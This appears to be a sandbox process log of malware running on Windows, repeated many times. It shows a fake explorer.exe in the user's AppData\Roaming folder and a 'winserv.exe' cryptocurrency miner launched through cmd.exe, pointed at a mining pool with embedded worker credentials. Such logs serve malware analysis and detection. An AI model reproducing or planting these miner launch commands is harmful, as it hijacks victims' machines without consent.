C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
